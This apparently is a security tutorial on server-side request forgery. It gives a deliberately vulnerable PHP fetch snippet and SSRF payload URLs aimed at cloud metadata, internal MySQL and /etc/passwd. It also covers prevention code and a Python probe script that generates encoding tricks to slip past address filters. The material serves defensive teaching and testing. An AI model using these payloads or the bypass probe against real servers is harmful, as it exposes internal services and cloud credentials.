
Understanding and Preventing Server-Side Request Forgery (SSRF)

By Admin · Mar 15, 2026 · Updated Apr 23, 2026 · 252 views · 2 min read

Server-Side Request Forgery (SSRF) is a vulnerability in which an attacker makes your server send requests to destinations the attacker chooses. Because the request originates from the server, it reaches whatever the server can reach: internal services, cloud metadata APIs, or other protected resources that are not exposed to the attacker directly. The request is usually HTTP, but any URL scheme the fetching library supports (file://, gopher://, ftp://) is in play.

How SSRF Works

<?php
# Vulnerable code example (PHP): the user controls the whole URL, including
# scheme, host and port, and the server fetches it as itself.
$url = $_GET["url"];
$content = file_get_contents($url);   # follows redirects; honours file://, ftp://, php:// and other stream wrappers
echo $content;

# An attacker could request:
# ?url=http://169.254.169.254/latest/meta-data/  (cloud metadata)
# ?url=http://127.0.0.1:3306/  (internal MySQL; the reply or the error message reveals that the port is open)
# ?url=http://internal-admin-panel.local/  (internal services)
# ?url=file:///etc/passwd  (local files, because file_get_contents() accepts stream wrappers)

Common SSRF Targets

  • Cloud metadata APIs — 169.254.169.254 (AWS, GCP, Azure credentials and instance configuration). A caveat worth knowing on both sides: AWS IMDSv2 only answers requests that carry a session token obtained with a PUT, GCP requires the Metadata-Flavor: Google header and Azure requires the Metadata: true header, so an SSRF that can only issue a plain GET is blunted on instances that enforce these (on AWS: aws ec2 modify-instance-metadata-options --http-tokens required on the instance)
  • Internal services — Redis, Memcached, MySQL, Elasticsearch on localhost; line-oriented protocols such as Redis accept raw commands when the attacker controls the request body or can use a gopher:// URL
  • Internal networks — Other servers on the same network; the status, error text or timing of the response reveals which hosts and ports are reachable even when no body comes back (blind SSRF)
  • Local files — Using the file:// scheme (in PHP also php://, data:// and the other stream wrappers)

Prevention Strategies

1. Input Validation

<?php
# Validate the URL before making the request: allowlist the exact hosts the
# application needs and fail closed on anything parse_url() cannot parse.
$allowed_domains = ["api.example.com", "cdn.example.com"];
$parsed = parse_url($url);
if ($parsed === false || empty($parsed["host"])) {
    die("Invalid URL");
}
$host = strtolower(rtrim($parsed["host"], "."));   # api.example.com. is the same host
if (!in_array($host, $allowed_domains, true)) {
    die("Domain not allowed");
}
# This checks only the name the user typed: the fetch must also stop following
# redirects (e.g. 'follow_location' => 0 in the stream context) and the address
# the name resolves to must still pass strategy 2.

2. Block Internal Addresses

# Deny requests whose destination address, after DNS resolution, falls in these ranges;
# check every address the name resolves to and repeat the check for each redirect hop.
# 0.0.0.0/8 ("this network"; connecting to 0.0.0.0 reaches localhost on Linux)
# 127.0.0.0/8 (loopback)
# 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16 (RFC 1918 private)
# 100.64.0.0/10 (shared address space, RFC 6598; used on some cloud networks)
# 169.254.0.0/16 (link-local / cloud metadata)
# ::1/128 (IPv6 loopback), fe80::/10 (IPv6 link-local)
# fc00::/7 (IPv6 unique local; AWS's IMDS IPv6 endpoint fd00:ec2::254 lives here)
# ::ffff:0:0/96 (IPv4-mapped IPv6: ::ffff:127.0.0.1 must be checked as 127.0.0.1)

# Using iptables to block outbound to metadata for the web server's user only
# (an unqualified OUTPUT rule also breaks cloud agents that legitimately need IMDS);
# REJECT fails fast instead of letting the request hang until timeout
sudo iptables -A OUTPUT -d 169.254.169.254 -m owner --uid-owner www-data -j REJECT
sudo ip6tables -A OUTPUT -d fd00:ec2::254 -m owner --uid-owner www-data -j REJECT

3. Use a Proxy for Outbound Requests

# Route all application HTTP requests through a forward proxy and make it the only
# path out: an egress firewall drops direct outbound traffic from the application,
# so code that bypasses the proxy cannot reach anything.
# The proxy resolves names itself and can deny by resolved address (Squid's dst ACL)
# and by name (dstdomain), giving one place to enforce the ranges above and to log
# every outbound request.
# Tools: Squid, tinyproxy

4. Disable Unnecessary URL Schemes

<?php
# Only allow http:// and https://; block file://, gopher://, dict://, ftp:// and
# PHP's php://, data://, phar:// wrappers. Compare the parsed scheme instead of
# regex-matching the raw string, and re-check every redirect target, since a
# redirect can switch schemes (with cURL, also restrict CURLOPT_REDIR_PROTOCOLS).
$scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
if (!in_array($scheme, ["http", "https"], true)) {
    die("Only HTTP(S) URLs allowed");
}
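The four strategies above stack. The following added example (my code, not the article's, and in Python rather than the page's PHP) shows them fitting together in one outbound-fetch helper: it allowlists scheme and host as strategies 1 and 4 do, applies the strategy 2 ranges to every address the name resolves to, decodes the numeric spellings a libc resolver would accept, and re-validates each redirect hop instead of letting the client follow redirects. The allowlisted hostnames are the article's placeholders; the urllib client and the injectable `resolver` parameter are my assumptions, the latter so the checks can be exercised offline against a constructed DNS table.

```python
# Added example (not the article's code): strategies 1, 2 and 4 in one fetch helper.
# Assumed: urllib client, the article's placeholder hosts, and an injectable resolver.
import ipaddress
import re
import socket
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"}   # the article's placeholders
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (   # never contact these
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10", "ff00::/8",
)]
_OCTET = re.compile(r"^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")

def legacy_ipv4(host):
    """Decode inet_aton() spellings (2130706433, 0x7f000001, 0177.0.0.1, 127.1) that
    ipaddress.ip_address() rejects but libc resolvers happily accept as 127.0.0.1."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_OCTET.match(p) for p in parts):
        return None
    nums = [int(p, 16) if p[:2].lower() == "0x" else int(p, 8) if p[0] == "0" else int(p)
            for p in parts]
    *lead, last = nums                       # the last part fills the remaining bytes
    if any(n > 255 for n in lead) or last >= 256 ** (4 - len(lead)):
        return None
    value = 0
    for n in lead:
        value = (value << 8) | n
    return ipaddress.IPv4Address((value << (8 * (4 - len(lead)))) | last)

def is_blocked(ip):
    """Range check; IPv4-mapped IPv6 (::ffff:127.0.0.1) is unwrapped first."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETWORKS)

def system_resolver(host):           # every A/AAAA answer the OS would use
    return {ipaddress.ip_address(ai[4][0].split("%")[0])
            for ai in socket.getaddrinfo(host, None)}

def static_resolver(table):          # {hostname: [ip strings]}: tests, pinned hosts
    return lambda host: {ipaddress.ip_address(a) for a in table.get(host, ())}

def validate_target(url, resolver=system_resolver, allowed_hosts=ALLOWED_HOSTS):
    """Raise ValueError for anything the server must not fetch; otherwise return
    (normalized host, set of checked addresses). allowed_hosts=None suits
    "any public host" use cases such as webhooks or link previews."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None:           # http://api.example.com@127.0.0.1/
        raise ValueError("userinfo in URL not allowed")
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        raise ValueError("missing host")
    if allowed_hosts is not None and host not in allowed_hosts:
        raise ValueError(f"host not allowed: {host}")
    try:                                     # literal in any spelling, or a name?
        addrs = {ipaddress.ip_address(host)}
    except ValueError:
        ip = legacy_ipv4(host)
        addrs = {ip} if ip is not None else set(resolver(host))
    if not addrs:
        raise ValueError(f"{host} does not resolve")
    for addr in addrs:                       # one bad answer among several rejects all
        if is_blocked(addr):
            raise ValueError(f"{host} -> {addr} is in a blocked range")
    return host, addrs

def reason_if_unsafe(url, **kw):
    """None if validate_target() accepts `url`, else the rejection reason (for logs)."""
    try:
        validate_target(url, **kw)
    except ValueError as err:
        return str(err)
    return None

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None                          # 3xx surfaces as HTTPError instead

def safe_fetch(url, max_redirects=3, max_bytes=1 << 20, **kw):
    """Fetch `url`, validating it and every Location it redirects to."""
    opener = urllib.request.build_opener(_NoRedirect())
    for _ in range(max_redirects + 1):
        validate_target(url, **kw)
        try:
            with opener.open(url, timeout=5) as resp:
                return resp.read(max_bytes)
        except urllib.error.HTTPError as err:
            location = err.headers.get("Location")
            if err.code not in (301, 302, 303, 307, 308) or not location:
                raise
            url = urljoin(url, location)     # validated again on the next pass
    raise ValueError("too many redirects")
```

Call `safe_fetch("https://api.example.com/v1")` in the application, or `reason_if_unsafe(url)` to log why a URL was refused. One gap remains by design: urllib resolves the name a second time when it connects, so a DNS answer that changes between the check and the connection (rebinding, with a short TTL) can still slip through. Closing that requires connecting to the address that was checked, which is exactly what an egress proxy enforcing the same ranges (strategy 3) does in one place.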

Testing for SSRF

# Test whether your application is vulnerable: supply internal addresses through any
# URL-taking input and compare the response (status, body, error text, timing) with a
# known-reachable and a known-unreachable URL; a difference means the server reached out.
# http://127.0.0.1
# http://localhost
# http://[::1]
# http://0.0.0.0
# http://169.254.169.254
# http://0x7f000001 (hex encoding of 127.0.0.1)
# http://2130706433 (decimal encoding of 127.0.0.1)
# http://0177.0.0.1 (octal encoding of 127.0.0.1)
# http://127.1 (short form; inet_aton fills in the missing octets)
# http://[::ffff:127.0.0.1] (IPv4-mapped IPv6)
# http://api.example.com@127.0.0.1 (userinfo trick against filters that read up to the first "/")
# For blind SSRF, where nothing comes back, point the input at a DNS/HTTP listener you
# control and watch for the server's callback.
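To see why the encodings matter, here is an added tester-side helper in Python (my code, not the article's). It generates the alternate spellings of one internal target, going beyond the hex and decimal forms listed above to the octal, short-dotted, IPv4-mapped IPv6 and userinfo forms, sends each through a URL parameter, and reports which ones get a different answer than the plain dotted form. The base URL, the parameter name `url`, the urllib fetcher and the substring-matching stand-in application are all constructed assumptions; against a real target, call `probe()` with the default fetcher.

```python
# Added example (not the article's code): generate SSRF host spellings and probe a
# URL parameter with them. Base URL, parameter name and fetcher are assumptions.
import ipaddress
import urllib.error
import urllib.parse
import urllib.request

def spellings(ip_str, decoy_host="api.example.com"):
    """Alternate host spellings for one IPv4 address, keyed by technique."""
    ip = ipaddress.IPv4Address(ip_str)
    n, b = int(ip), ip.packed
    return {
        "dotted": str(ip),
        "decimal": str(n),                                  # 2130706433
        "hex": f"0x{n:08x}",                                # 0x7f000001
        "octal": ".".join(f"0{x:o}" for x in b),            # 0177.00.00.01
        "short": f"{b[0]}.{n & 0xFFFFFF}",                  # 127.1
        "ipv6-mapped": f"[::ffff:{ip}]",                    # [::ffff:127.0.0.1]
        "ipv6-mapped-hex": f"[::ffff:{n >> 16:x}:{n & 0xFFFF:x}]",  # [::ffff:7f00:1]
        "userinfo": f"{decoy_host}@{ip}",                   # api.example.com@127.0.0.1
    }

def urllib_fetch(url, timeout=5):
    """Return (status, body length); HTTP error statuses are results, not exceptions."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, len(err.read())

def probe(base_url, param, ip_str, fetch=urllib_fetch, path="/"):
    """Send each spelling as `?param=http://<host>/` and collect the responses."""
    results = {}
    for technique, host in spellings(ip_str).items():
        query = urllib.parse.urlencode({param: f"http://{host}{path}"})
        results[technique] = fetch(f"{base_url}?{query}")
    return results

def suspicious(results):
    """Techniques whose response differs from the plain dotted form: if the dotted
    form is blocked and these are not, the filter is matching strings, not addresses."""
    baseline = results["dotted"]
    return sorted(t for t, r in results.items() if r != baseline)

def naive_string_filter(url):
    """Constructed stand-in for a vulnerable app (not a real endpoint): its only
    defence is a substring check on the decoded `url` parameter."""
    target = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query).get("url", [""])[0]
    return (403, 0) if "127.0.0.1" in target or "localhost" in target else (200, 1234)

if __name__ == "__main__":
    found = probe("http://app.example/fetch", "url", "127.0.0.1", fetch=naive_string_filter)
    for technique, result in found.items():
        print(f"{technique:16} {result}")
    print("bypasses:", suspicious(found))
```

Against the constructed filter, the dotted, IPv4-mapped and userinfo forms are rejected because the literal string 127.0.0.1 appears in them, while the decimal, hex, octal, short and hex-mapped forms sail through: the same behaviour you will see from any WAF rule or input check that inspects the text of the parameter rather than the address it resolves to.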

WAF Rules for SSRF

# A WAF sees the inbound request, not the server's outbound one, so it can only
# reject parameters that look like SSRF payloads; the encodings in the testing section
# above are exactly what such pattern matching misses. Treat it as a secondary
# control behind the validation and network rules above.
# Nginx itself cannot filter the application's outbound requests; pair it with
# ModSecurity (the nginx connector) for inbound pattern rules
# ModSecurity with the OWASP Core Rule Set ships rules that flag SSRF-style
# parameters (internal addresses, metadata endpoints, dangerous schemes)
# Cloudflare WAF includes SSRF protection rules
